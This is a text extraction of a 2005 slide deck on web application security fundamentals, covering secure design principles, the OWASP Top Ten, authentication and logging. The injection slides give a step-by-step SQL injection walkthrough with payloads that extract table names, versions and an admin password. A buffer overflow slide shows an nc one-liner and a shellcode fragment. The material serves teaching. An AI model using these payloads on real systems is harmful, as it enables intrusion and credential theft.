10 – 12 APRIL 2005 Riyadh, Saudi Arabia
Dec 31, 2015
10 – 12 APRIL 2005 Riyadh, Saudi Arabia10 – 12 APRIL 2005 Riyadh, Saudi Arabia
Web Application Security FundamentalsWeb Application Security Fundamentals
Murat LostarInformation Security Consultant
“When we face a choice between adding new features and resolving security issues, we need to choose security.
Our products should emphasize security right out of the box”
Bill Gates
CIA ConceptCIA Concept
ConfidentialityInformation must be protected from unauthorized disclosure
IntegrityInformation must be protected from unauthorized modification
AvailabilityInformation must be available when the users need it
The goal of an attackThe goal of an attack
Steal data
Blackmail
Beachhead for other attacks
Bragging rights
Vandalism
Demonstrate vulnerability/satisfy curiosity
Damage company reputation
Designing Secure SystemsDesigning Secure Systems
Designing Secure SystemsDesigning Secure Systems
How much security does a web application require?
Zero risk is not practical
There are usually multiple ways to mitigate risk
Don’t spend $ 1.000.000 to protect $ 0,1
Security is almost always overhead, either in cost or performance
Designing Secure SystemsDesigning Secure Systems
Common Security Mistakes
Security Principles
Security Design by Threat Modeling - STRIDE
Security Techniques
A Cornucopia of Threats and Solutions
Common Security MistakesCommon Security Mistakes
Not designing applications with security in mind.
Adding security to the application as an afterthought.
This can be expensive than you think.
Adding security later,
Can change the way the features have been implemented
Can change the application interface
Can break the previously written code
Why these mistakes are made?Why these mistakes are made?
Security is boring
Security disables some functionality.
Security is difficult to measure.
Security is not the interest of the designers and developers creating the product.
Security PrinciplesSecurity Principles
Establish a Security Process
If you don’t define a process for designing, coding, testing, deploying and fixing systems in a secure manner, it’s very likely that you will spend a huge amount of time fixing security bugs.
Consider Security as a Product Feature
Build and review the development plan.
Security PrinciplesSecurity Principles
Define the Product Security Goals
Who is the audience?
What does security mean to the audience?
Where will the application run?
What are you attempting to protect?
Who will manage the application?
What are the communication needs of the product?
What security infrastructure services do the OS and the environment already provide?
Security PrinciplesSecurity Principles
Learn from Mistakes – Every bug is a learning opportunity
How did the security error occur?
Is the same error replicated in other areas of code?
How could we have prevented this code from occurring?
How do we make sure this kind of error does not happen in the future?
Use Least PrivilegeWhat resources must your application access?
What special tasks must your application perform?
Security PrinciplesSecurity Principles
Use Compartmentalization (separation of privileges)Separation between users, processes, data, and networks helps contain problems if they occur.
Give the
Use Defense in DepthDon’t rely on other systems to protect you
At some stage you (your software) have to defend yourself.
Implement a “default deny” stance
Security PrinciplesSecurity Principles
Assume External Systems Are Insecure
Until proved otherwise, all external stimuli have the potential to be an attack.
Plan on Failure
Bugs happen
Make security contingency plan
Fail to a Secure Mode
The application has not disclosed any data that would not be disclosed ordinarily, the data still can not be tampered with, ...
Do not issue huge swaths of information explaining why the error occured. Give the user a little bit of information.
Here is an example:
Security Principles – Code ExampleSecurity Principles – Code Example
...
DWORD dwRet = IsAccessAllowed(...)
if (dwRet == ERROR_ACCESS_DENIED) {
// Security check failed.
// Inform user that access id denied.
} else {
// Security check OK.
// Perform task.
}
....
Security Principles – Code ExampleSecurity Principles – Code Example
...
DWORD dwRet = IsAccessAllowed(...)
if (dwRet == NO_ERROR) {
// Security check OK.
// Perform task.
} else {
// Security check failed.
// Inform user that access id denied.
}
....
Security PrinciplesSecurity Principles
Employ Secure DefaultsIf a feature is not running, it cannot be vulnerable to attack
Another reason for not enabling features by default is Performance.
Backward Compatibility Issue?Be ready to face many upgrade and backward compatibility issues if you change critical features (for security reasons.)
The weak version of the protocol lives forever.
Security Features = Secure Features ???Security features do not necessarily make for a secure application.
Security PrinciplesSecurity Principles
Never Depend on Security Through Obscurity
Always assume that an attacker knows everything you know
Validate input and output
User input and output to and from the system is the route for malicious payloads into or out of the system
Allow only explicitly defined characteristics and drop all other data
Security PrinciplesSecurity Principles
Keep it simple
Often the most effective security is the simples security
If the steps to secure a function or module of the application are too complex, they probably won’t be followed
Complex code is hard to understand, makes maintenance error-prone
Security PrinciplesSecurity Principles
Use and reuse trusted components
When someone else has proven they got it right, take advantage of it
Beneficial from both a resource and security perspective
Only as secure as the weakest link
Attackers will find the weakest point and attempt to exploit it
Don’t leave all the locks on the front door and leave the back door swinging open
Security Principles – Three Final PointsSecurity Principles – Three Final Points
If you find a security bug, fix it and go looking for similar issues in other parts of the code.
If you find a security bug, make the fix as close as possible to the location of the vulnerability.
If there is a fundamental reason why a security flaw exists, fix the root of the problem. Don’t patch it over.
An ExampleAn Example
WebBrowser
WebServer
App. Comp.
DBServer
Authentication Data
Web Pages
Application Data
Audit Data
LDAP
HTTP DCOM SQL Over Sockets
An ExampleAn Example
Threat 1: A malicious user can view or tamper with personal data en route from the Web server to the client or from the client to the Web server
Threat 2: A malicious user can view or tamper with personal data en route from the Web server to the application component or from the component to the Web server
An ExampleAn Example
Threat 3: A malicious user can access or tamper with the personal data directly in the database
Threat 4: A malicious user can view LDAP Authentication packets and learn how to reply to them so that he can act “on behalf of” the user
An ExampleAn Example
Threat 5: A malicious user can deface or redirect the Web server by changing one or more Web pages
Threat 6: An attacker can deny access to the database server by flooding it with TCP/IP packets
An ExampleAn Example
Threat 7: An attacker can delete or modify the audit logs
Threat 8: An attacker can place his own Web server on the network after killing the original server with a distributed DoS attack.
OWASP.orgOWASP.org
Open Web Application Security Project
Top-Ten Web Security Vulnerabilities
Top-Ten Web Security Vulnerabilities Top-Ten Web Security Vulnerabilities
1 Unvalidated Input
2 Broken Access Control
3 Broken Authentication and Session Management
4 Cross Site Scripting (XSS) Flaws
5 Buffer Overflows
6 Injection Flaws
7 Improper Error Handling
8 Insecure Storage
9 Denial of Service
10 Insecure Configuration Management
Top-Ten Web Security Vulnerabilities Top-Ten Web Security Vulnerabilities
1 Unvalidated Input
2 Broken Access Control
3 Broken Authentication and Session Management
4 Cross Site Scripting (XSS) Flaws
5 Buffer Overflows
6 Injection Flaws
7 Improper Error Handling
8 Insecure Storage
9 Denial of Service
10 Insecure Configuration Management
#10: Web/App Server Misconfiguration#10: Web/App Server Misconfiguration
Tension between “work out of the box” and “use only what you need”
Developers ≠ web masters
ExamplesUnpatched security flaws
Misconfigurations that allow directory traversal
Administrative services accessible
Default accounts/passwords
CountermeasuresCreate and use hardening guides
Turn off all unused services
Set up and audit roles, permissions, and accounts
Set up logging and alerts
Top-Ten Web Security Vulnerabilities Top-Ten Web Security Vulnerabilities
1 Unvalidated Input
2 Broken Access Control
3 Broken Authentication and Session Management
4 Cross Site Scripting (XSS) Flaws
5 Buffer Overflows
6 Injection Flaws
7 Improper Error Handling
8 Insecure Storage
9 Denial of Service
10 Insecure Configuration Management
#9 Denial-of-Service#9 Denial-of-Service
Top-Ten Web Security Vulnerabilities Top-Ten Web Security Vulnerabilities
1 Unvalidated Input
2 Broken Access Control
3 Broken Authentication and Session Management
4 Cross Site Scripting (XSS) Flaws
5 Buffer Overflows
6 Injection Flaws
7 Improper Error Handling
8 Insecure Storage
9 Denial of Service
10 Insecure Configuration Management
#8: Poor Cryptography#8: Poor Cryptography
Insecure storage of credit cards, passwords, etc.
Poor choice of algorithm (or invent your own)
Poor randomnessSession IDs
Tokens
Cookies
Improper storage in memory
CountermeasuresStore only what you must
Store a hash instead of the full value
Use only vetted, public cryptography
Top-Ten Web Security Vulnerabilities Top-Ten Web Security Vulnerabilities
1 Unvalidated Input
2 Broken Access Control
3 Broken Authentication and Session Management
4 Cross Site Scripting (XSS) Flaws
5 Buffer Overflows
6 Injection Flaws
7 Improper Error Handling
8 Insecure Storage
9 Denial of Service
10 Insecure Configuration Management
#7: Error Handling#7: Error Handling
Examples: stack traces, DB dumps
Helps attacker know how to target the app
Inconsistencies can be revealing too“File not found” vs. “Access denied”
Fail-open errors
Need to give enough info to user w/o giving too much info to attacker
CountermeasuresCode review
Modify default error pages (404, 401, etc.)
Error messages exampleError messages example
Top-Ten Web Security Vulnerabilities Top-Ten Web Security Vulnerabilities
1 Unvalidated Input
2 Broken Access Control
3 Broken Authentication and Session Management
4 Cross Site Scripting (XSS) Flaws
5 Buffer Overflows
6 Injection Flaws
7 Improper Error Handling
8 Insecure Storage
9 Denial of Service
10 Insecure Configuration Management
#6: Command Injection#6: Command Injection
Allows attacker to relay malicious code in form variables or URL
System commands
SQL
Interpreted code (Perl, Python, etc.)
Many apps use calls to external programs
sendmail
Countermeasures
Taint all input
Avoid system calls (use libraries instead)
Run with limited privileges
Injection in ASPInjection in ASP
Login:Select * from users where username = ‘” + username + “’ and password = ‘” + password + “’”;
Goal: gain information and administrator access
Methodology: inject SQL statement in the ‘username’ and ‘password’ fields
Collect informationCollect informationSelect * from users where username = ‘” + username + “’
and password = ‘” + password + “’”;
1. Get database tableUsername: ' having 1=1--
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid …
2. Get columnsUsername: ' group by users.id having 1=1--
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid …
3. Get typesUsername: ' union select sum(username) from users--
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
Gain accessGain accessSelect * from users where username = ‘” + username + “’ and
password = ‘” + password + “’”;
4. Get version info. Of SQL server and OSUsername: ' union select @@version,1,1,1--
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) … Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' …
5. Get usernamesUsername: ' union select min(username),1,1,1 from users where username > 'a'--
Syntax error converting the varchar value 'admin' to a column of data type int.
6. Get passwordUsername: ' union select password,1,1,1 from users where username = 'admin'--
Syntax error converting the varchar value 'r00tr0x!' to a column of data type int.
Top-Ten Web Security Vulnerabilities Top-Ten Web Security Vulnerabilities
1 Unvalidated Input
2 Broken Access Control
3 Broken Authentication and Session Management
4 Cross Site Scripting (XSS) Flaws
5 Buffer Overflows
6 Injection Flaws
7 Improper Error Handling
8 Insecure Storage
9 Denial of Service
10 Insecure Configuration Management
#5: Buffer Overflows#5: Buffer OverflowsMostly affects web/app servers
Can affect apps/libraries too
Goal: crash the target app and get a shell
Buffer overflow exampleecho “vrfy `perl –e ‘print “a” x 1000’`” |nc www.targetsystem.com 25
Replace all those “a”s with something like this…char shellcode[] = “\xeb\xlf\x5e\x89\x76\x08…”
CountermeasuresKeep up with bug reports/patches
Code reviews
Run with limited privileges
Top-Ten Web Security Vulnerabilities Top-Ten Web Security Vulnerabilities
1 Unvalidated Input
2 Broken Access Control
3 Broken Authentication and Session Management
4 Cross Site Scripting (XSS) Flaws
5 Buffer Overflows
6 Injection Flaws
7 Improper Error Handling
8 Insecure Storage
9 Denial of Service
10 Insecure Configuration Management
#4: Cross-Site Scripting (XSS)#4: Cross-Site Scripting (XSS)Attacker uses trusted application/company to reflect malicious code to end-user
Attacker can “hide” the malicious code
Unicode encoding
2 types of attacks
Stored
Reflected
Wide-spread problem!
Countermeasures
input validation
Positive
Negative: “< > ( ) # &”
Don’t forget these: “< > ( ) # &”
User/customer education
Top-Ten Web Security Vulnerabilities Top-Ten Web Security Vulnerabilities
1 Unvalidated Input
2 Broken Access Control
3 Broken Authentication and Session Management
4 Cross Site Scripting (XSS) Flaws
5 Buffer Overflows
6 Injection Flaws
7 Improper Error Handling
8 Insecure Storage
9 Denial of Service
10 Insecure Configuration Management
#3: Broken Account and Session Management#3: Broken Account and Session Management Weak authentication
Password-only
Easily guessable usernames (admin, etc.)
Unencrypted secrets are sniffable
How to break in
Guess/reset password
Have app email you new password
Sniff or crack password
Backend authentication
How are database passwords stored?
Trust relationships between hosts (IP address can be spoofed, etc.)
Countermeasures
Strong passwords
Remove default user names
Protect sensitive files
Top-Ten Web Security Vulnerabilities Top-Ten Web Security Vulnerabilities
1 Unvalidated Input
2 Broken Access Control
3 Broken Authentication and Session Management
4 Cross Site Scripting (XSS) Flaws
5 Buffer Overflows
6 Injection Flaws
7 Improper Error Handling
8 Insecure Storage
9 Denial of Service
10 Insecure Configuration Management
#2: Broken Access Control#2: Broken Access ControlUsually inconsistently defined/applied
Examples
Forced browsing past access control checks
Path traversal
File permissions – may allow access to config/password files
Client-side caching
Countermeasures
Use non-programmatic controls
Verify access control via central container
Code reviews
Top-Ten Web Security Vulnerabilities Top-Ten Web Security Vulnerabilities
1 Unvalidated Input
2 Broken Access Control
3 Broken Authentication and Session Management
4 Cross Site Scripting (XSS) Flaws
5 Buffer Overflows
6 Injection Flaws
7 Improper Error Handling
8 Insecure Storage
9 Denial of Service
10 Insecure Configuration Management
#1: Unvalidated Parameters#1: Unvalidated ParametersAttacker can easily change any part of the HTTP request before submitting
URL
Cookies
Form fields
Hidden fields
Headers
Encoding is not encryptingToasted Spam: http://www.toastedspam.com/decode64
Input must be validated on the server (not just the client).CoolCarts: http://www.extremelasers.com
CountermeasuresTainting (Perl)
Code reviews (check variable against list of allowed values, not vice-versa)
Application firewalls
CodeSeeker: http://www.owasp.org/codeseeker/
Real-time auditing: http://www.covelight.com
© 2005 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only.MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.
Security Techniques - AuthenticationSecurity Techniques - Authentication
Authentication – The process of verifying a claimed identity
User Authentication
The process of determining that a user is who he/she claims to be
Usually happens only once per session
May need to re-authenticate during a session e.g. before a significant monetary action
Entity Authentication
The process of determining if an entity is who it claims to be
Usually takes place with every request
AuthenticationAuthentication
User AuthenticationBasic authentication – Clear Text
Digest authentication
Forms-based authentication<%
Dim strUsername, strPwd
strUsername = Request.Form(“Username”)
strPwd = Request.Form(“Pwd”)
%>
Passport authentication - SSO
Windows authenticationNTLM authentication
Kerberos authentication
X.509 certificate authentication
AuthenticationAuthentication
Entity Authentication
Cookie based
Infrastructure Authentication
IPSec
X.509 certificate authentication
AuthenticationAuthentication
Cookies
Persistent and Secure
Persistent and Non-secure
Non-persistent and Secure
Non-persistent and Non-secure
AuthenticationAuthentication
Managing User Sessions
Session tokens
Cryptographic algorithms
All session tokens should be user unique, non-predictable, and resistant to reverse engineering
Use a trusted random number generator
Map session tokens in some way to a specific HTTP client instance to prevent hijacking and replay attacks
Do not base a session token algorithm on or use as variables any user personal information
AuthenticationAuthentication
Expire session tokens on the HTTP server when the session ends
Regenerate session tokens while the session is active
Build methods to detect session forging/brute-forcing and/or lockout
Re-authenticate users before significant actions
Encrypt session tokens during transmission
Use page-specific tokens in conjunction with session-specific tokens
Overwrite session tokens on logout
Security Techniques – Authorization and Access ControlSecurity Techniques – Authorization and Access Control
Limits what users can do, which resources they have access to, and what functions they are allowed to perform on the data.
AuthorizationThe act of checking to see if a user has the proper permission to access a particular file or perform a particular action
Access ControlThe more general way of controlling access to web resources, including restrictions based on things like the time of day, the IP address or domain of the client browser, the type of encryption the HTTP client can support, number of times the user has authenticated that day, etc.
Any access control mechanism depends on effective and forge-resistant authentication controls for authorization
Access Control and AuthorizationAccess Control and Authorization
Access ControlDiscretionary Access Control
Restricts access to information based on the identity
Decentralized model
Mandatory Access Control
Assigning sensitivity labels on information and comparing this level of sensitivity at which a user operates
For extremely secure systems
Role-based Access Control
Access decisions are based on an individual’s roles and responsibilities within the organization or user base
Centralized administration
Scalable
Access Control and AuthorizationAccess Control and Authorization
In Windows Environment
Access Control Lists
Privileges
IP Restrictions
Server-Specific Permissions
Security TechniquesSecurity Techniques
Tamper-Resistant and Privacy-Enhanced Technologies
SSL / TLS
IPSec
DCOM and RPCs
Encrypting File System
Security TechniquesSecurity Techniques
Protect Secrets – Don’t Store SecretsIf you don’t store the data, the attacker cannot gain access!
Encryption, Hashes, MACs, and Digital SignaturesHide information from prying eyes.
FilteringInspect data as received and making a decision to accept or reject
ThrottlingLimit the number of requests to your system
Quality of ServicePreferential treatment for specific types of traffic
Least PrivilegeAlways run with just enough privilege to get the job done
Security Techniques - LoggingSecurity Techniques - Logging
Importance of loggingProvides key security information about a web application and its associated process and integrated technologies
Makes individual users accountable for their actions
Often the only record of suspicious behavior – Base of IDS
LoggingLogging
What to log
In general, time of event, initiating process or owner of process, detailed description of the event
Reading/writing/modifying/deleting data
Network communications at all points
All authentication/authorization events
All administrative functions, regardless of
Debugging information that can be enabled/disabled on the fly
LoggingLogging
Best practices for log managementCollect and consolidate logs on a separate dedicated logging host
Encrypt network connections and log data contents to protect confidentiality and integrity
Set log file attributes so that only new information can be written (older records cannot be rewritten or deleted)
Copy logs at regular intervals, depending on size and volume
Verify regularly that logging is operational
Copy log files to permanent storage and include in backup strategy
Dispose of log files according to company record retention policy
Synchronize all logging components with a time server so that all logging can be consolidated effectively without latency errors.
Some Common ThreatsSome Common Threats
Access to or modification of confidential data
Read or modify e-mail-based communication
Flood service with too many connections
Attempt to guess password
Attacker spoof a server
Attacker posts HTML or scripts to your site
Your data packets can be replayed
Attacker gains physical access to hardware
Attacker modifies configuration data
Error message leak too much information
An attacker accesses or uses data cached by a previous user
Attacker shuts down your process
Attacker modifies configuration data
What to do next?What to do next?
Here are a few tips for the beginning:
Data Validation
Privacy Considerations
Data ValidationData Validation
One of the most important aspects of designing a secure web application
Applies to input to and output from a web application
Validation strategiesAccept only known valid data
Accept only input that is known to be safe and expected
The best possible strategy, but not always feasible
Reject known bad dataCan limit exposure
Relies on the application knowing about specific malicious payloads
Sanitize all dataAn effective second line of defense
May be hard and time-consuming to perform
Data ValidationData Validation
All three data validation strategies must check
Data type
Syntax
Length
Never rely on client-side validation
Data validation must be done on the trusted server or under the control of the application
Client-side data validation can always be bypassed
An attacker can watch the return value and modify it at will
Privacy ConsiderationsPrivacy Considerations
Warn users about the dangers of communal web browsers
Pages may be retained in the browser cahce
Logging out and closing the browser to kill session cookies is recommended
Temp files may remain
Proxy servers and other LAN users may intercept traffic
Design sites with the assumption that no part of a client is secure and make no assumptions about integrity
Privacy ConsiderationsPrivacy Considerations
Display personal data when really needed
Set pages to pre-expire
Set the no-cache meta tags
Otherwise, mask personal data, displaying only a subset
Offer an enhanced privacy login option to the user
Keep sensitive data out of the browser history by using POST for all form submissions
© 2005 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only.MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.